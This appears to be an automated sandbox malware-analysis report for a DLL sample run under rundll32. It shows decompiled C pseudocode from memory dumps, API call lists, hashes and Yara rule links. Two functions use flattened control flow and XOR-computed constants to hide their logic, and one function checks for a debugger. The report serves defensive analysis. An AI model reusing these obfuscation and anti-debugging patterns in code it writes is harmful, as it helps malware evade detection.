Uniqueness Score: -1.00%

Function 10030A43, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 10030A97

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 656fd3d2af3d77fe275d64a071c693e18bf46d6e3d073fd4daa8a3a260b6e5ce
Instruction ID: 105c4676d607423172ac9ef3bccf40151377e17b51807f362044628198562279
Opcode Fuzzy Hash: 656fd3d2af3d77fe275d64a071c693e18bf46d6e3d073fd4daa8a3a260b6e5ce
Instruction Fuzzy Hash: A221B072A56207AFEB1ACB25ED61AAB73E8EF04346F11407AFD01CA141EB74ED04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B29A37, Relevance: 1.6, Strings: 1, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00B29A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00B27998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E00B27998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E00B3360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E00B3360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00B28736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E00B3360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E00B350F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00B37F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00B27998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E00B3360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E00B3360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

0x00b29a43
0x00b29a46
0x00b29a48
0x00b29a4a
0x00b29a4d
0x00b29a4e
0x00b29a4f
0x00b29a54
0x00b29a5b
0x00b29a5e
0x00b29a64
0x00b29a68
0x00b29a6d
0x00b29a70
0x00b29a77
0x00b29a7e
0x00b29a85
0x00b29a8c
0x00b29a93
0x00b29a97
0x00b29aa4
0x00b29aa7
0x00b29aaa
0x00b29ab1
0x00b29ab8
0x00b29abf
0x00b29ac6
0x00b29acd
0x00b29ad4
0x00b29adf
0x00b29ae2
0x00b29ae9
0x00b29af0
0x00b29af7
0x00b29afe
0x00b29b09
0x00b29b0c
0x00b29b10
0x00b29b17
0x00b29b1e
0x00b29b22
0x00b29b29
0x00b29b34
0x00b29b37
0x00b29b45
0x00b29b48
0x00b29b4f
0x00b29b59
0x00b29b5c
0x00b29b5f
0x00b29b66
0x00b29b6d
0x00b29b74
0x00b29b7b
0x00b29b82
0x00b29b89
0x00b29b90
0x00b29b97
0x00b29b9e
0x00b29ba5
0x00b29bac
0x00b29bb3
0x00b29bba
0x00b29bc1
0x00b29bc8
0x00b29bcf
0x00b29bd6
0x00b29bdf
0x00b29be6
0x00b29bed
0x00b29bf4
0x00b29bf8
0x00b29bff
0x00b29c06
0x00b29c13
0x00b29c16
0x00b29c19
0x00b29c20
0x00b29c27
0x00b29c2e
0x00b29c32
0x00b29c39
0x00b29c47
0x00b29c4a
0x00b29c51
0x00b29c58
0x00b29c5f
0x00b29c69
0x00b29c6e
0x00b29c76
0x00b29c7b
0x00b29c80
0x00b29c87
0x00b29c8e
0x00b29c95
0x00b29c9c
0x00b29ca7
0x00b29ca8
0x00b29cab
0x00b29cb2
0x00b29cb9
0x00b29cbd
0x00b29cc4
0x00b29ccb
0x00b29cd2
0x00b29cd9
0x00b29ce0
0x00b29ce7
0x00b29ceb
0x00b29cef
0x00b29cf6
0x00b29cfd
0x00b29d09
0x00b29d0c
0x00b29d13
0x00b29d1a
0x00b29d25
0x00b29d28
0x00b29d2f
0x00b29d36
0x00b29d3d
0x00b29d41
0x00b29d48
0x00b29d4f
0x00b29d56
0x00b29d5d
0x00b29d64
0x00b29d68
0x00b29d6f
0x00b29d76
0x00b29d7d
0x00b29d84
0x00b29d8b
0x00b29d92
0x00b29d96
0x00b29d9d
0x00b29da8
0x00b29dab
0x00b29daf
0x00b29daf
0x00b29db6
0x00b29db6
0x00b29db6
0x00b29db6
0x00b29dbc
0x00000000
0x00000000
0x00b29dc2
0x00b29ee5
0x00b29eea
0x00b29eed
0x00000000
0x00b29dc8
0x00b29dce
0x00b29ebf
0x00b29ec4
0x00b29ec7
0x00000000
0x00b29dd4
0x00b29dda
0x00b29e9a
0x00b29e9d
0x00b29ea2
0x00000000
0x00b29de0
0x00b29de6
0x00b29e79
0x00b29e88
0x00b29e8d
0x00b29e90
0x00000000
0x00b29dec
0x00b29df2
0x00b29e55
0x00b29e64
0x00b29e69
0x00b29e6c
0x00000000
0x00b29df4
0x00b29dfa
0x00b29e32
0x00b29e37
0x00b29e3c
0x00b29e3f
0x00b29e40
0x00b29e42
0x00b29e48
0x00000000
0x00b29e48
0x00b29dfc
0x00b29e02
0x00000000
0x00b29e08
0x00b29e0b
0x00b29e1a
0x00b29e1f
0x00b29e22
0x00000000
0x00b29e22
0x00b29e02
0x00b29dfa
0x00b29df2
0x00b29de6
0x00b29dda
0x00b29dce
0x00b29f45
0x00b29f47
0x00b29f4b
0x00b29f4b
0x00b29f52
0x00b29f52
0x00b29ef7
0x00b29efd
0x00b29fbe
0x00b29fc3
0x00b29fc6
0x00000000
0x00b29f03
0x00b29f03
0x00b29f09
0x00b29fa1
0x00b29fa4
0x00000000
0x00b29f0f
0x00b29f0f
0x00b29f15
0x00b29f88
0x00b29f8d
0x00b29f90
0x00000000
0x00b29f17
0x00b29f17
0x00b29f1d
0x00b29f65
0x00b29f6a
0x00b29f6d
0x00000000
0x00b29f1f
0x00b29f1f
0x00b29f25
0x00000000
0x00b29f2b
0x00b29f3d
0x00b29f42
0x00b29f25
0x00b29f1d
0x00b29f15
0x00b29f09
0x00000000
0x00b29fcb
0x00b29fcb
0x00b29fcb
0x00000000

Strings

'Vj, xrefs: 00B29D96

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'Vj
API String ID: 0-2210790371
Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction ID: 75b6dbe1d200a4b02a128cfa4a2888c50e7e9b63f4263cbd80509e66e779d3c0
Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction Fuzzy Hash: DFF13272C00329DBDF18CFE5D98A9DEBBB1FB04314F248199D419BA2A4D7B41A49DF41

Uniqueness

Uniqueness Score: -1.00%

Function 100306CA, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

EnumSystemLocalesW.KERNEL32(100307F0,00000001,00000000,?,-00000050,?,10030E1E,00000000,?,?,?,00000055,?), ref: 1003073C

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e13fbe504d87dc009826e1637f72a1085f15cbdfe2efef51b584ce13ac1455e5
Instruction ID: 8eea5f8cc6b9ab827f749b3019a317672bf3f0413d5c02f1b86d60b34d65ac19
Opcode Fuzzy Hash: e13fbe504d87dc009826e1637f72a1085f15cbdfe2efef51b584ce13ac1455e5
Instruction Fuzzy Hash: C411293A6047065FEB08DF38C8A15AAB792FF80359F15442CF9478BB41D7317842CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1003B720, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 1003B727

Part of subcall function 1003D8F1: __cftoe.LIBCMT ref: 1003D938
Part of subcall function 1003D8F1: OutputDebugStringW.KERNEL32(00000000,?,?,?,?), ref: 1003D947

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: DebugDebuggerOutputPresentString__cftoe
String ID:
API String ID: 3697724916-0
Opcode ID: 53e7490d46d06abc2b98fe09d8e261a740ddcaec7652e95acb1109bae46e172e
Instruction ID: a57640fa1d9595e20617579de37c845f9443baf4e031f610f4daf93e327c88be
Opcode Fuzzy Hash: 53e7490d46d06abc2b98fe09d8e261a740ddcaec7652e95acb1109bae46e172e
Instruction Fuzzy Hash: 29F028391089157FEA32DA507C46BAE374CEF862EAF540411FF04CE001CF20ED4191B2

Uniqueness

Uniqueness Score: -1.00%

Function 10030C6F, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,10030A0C,00000000,00000000,?), ref: 10030C9B

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: fabc94597d480a5aef55e417e2330f9329f08d51356cd6f365fc0c147bb366f3
Instruction ID: 51dc285cc9bbf7d0299c7e13856be30826422c1d9b472e138805ac64d17bd09d
Opcode Fuzzy Hash: fabc94597d480a5aef55e417e2330f9329f08d51356cd6f365fc0c147bb366f3
Instruction Fuzzy Hash: 27F0F436A21112BFEB15CB21C816ABB77A8EB40696F014638FD06B7181EA34FD41C690

Uniqueness

Uniqueness Score: -1.00%

Function 10030765, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

EnumSystemLocalesW.KERNEL32(10030A43,00000001,00000000,?,-00000050,?,10030DE2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 100307AF

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6058e53b05fef7ddfa573d6d5b200a5cfb2ba1fc766a413d53e96e2a13e3772a
Instruction ID: 6b6b92399af16a9416119709f29f4c141f16779e493e5f232c74b8762caca927
Opcode Fuzzy Hash: 6058e53b05fef7ddfa573d6d5b200a5cfb2ba1fc766a413d53e96e2a13e3772a
Instruction Fuzzy Hash: AEF0463A7053045FE705DF35DC90A6ABBD1EF807A8F05402CFA068F681D6B1BC02CA40

Uniqueness

Uniqueness Score: -1.00%

Function 00B31BDF, Relevance: 1.5, Strings: 1, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B31BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0xb3ca2c; // 0x505cc8
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E00B278A5(_t315, _t315, 0x10, _t315, 4);
							E00B27787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00B27787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E00B278A5(_t315, _t315, 0x10, _t315, 4);
								E00B27787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00B38C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00B27787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}

0x00b31be8
0x00b31bf0
0x00b31bf7
0x00b31bfd
0x00b31c04
0x00b31c09
0x00b31c10
0x00b31c17
0x00b31c23
0x00b31c28
0x00b31c2d
0x00b31c34
0x00b31c3e
0x00b31c43
0x00b31c48
0x00b31c4f
0x00b31c52
0x00b31c59
0x00b31c60
0x00b31c67
0x00b31c71
0x00b31c76
0x00b31c7b
0x00b31c82
0x00b31c89
